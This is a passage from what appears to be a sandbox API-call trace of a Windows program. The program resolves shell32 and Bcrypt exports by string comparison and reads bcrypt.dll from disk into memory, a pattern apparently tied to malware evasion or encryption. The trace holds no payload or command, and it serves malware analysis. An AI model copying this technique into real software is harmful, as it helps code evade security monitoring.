lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0176.581] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0176.582] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0176.751] GetProcessHeap () returned 0x580000 [0176.751] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x40b8040 | out: hHeap=0x580000) returned 1 [0177.278] GetProcessHeap () returned 0x580000 [0177.278] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x5991c0 [0177.279] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0177.285] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0177.285] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0177.285] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0177.285] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0177.285] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0177.285] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0177.286] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0177.286] GetProcessHeap () returned 0x580000 [0177.286] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26fa0) returned 0x2cf2010 [0177.287] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0177.287] ReadFile (in: hFile=0x15c, lpBuffer=0x2cf2010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf2010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0177.290] CloseHandle (hObject=0x15c) returned 1 [0177.291] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0177.291] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0177.291] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0177.291] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0177.291] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0177.291] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0177.291] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0177.291] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0177.291] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0177.291] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0177.291] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.291] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0177.292] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0177.292] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0177.292] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0177.292] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.292] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.292] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0177.292] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0177.292] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0177.292] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0177.292] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0177.293] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0177.294] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0177.294] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0177.295] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0177.296] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.297] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.297] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0177.297] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0177.297] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0177.297] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0177.297] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0177.297] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0177.298] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", 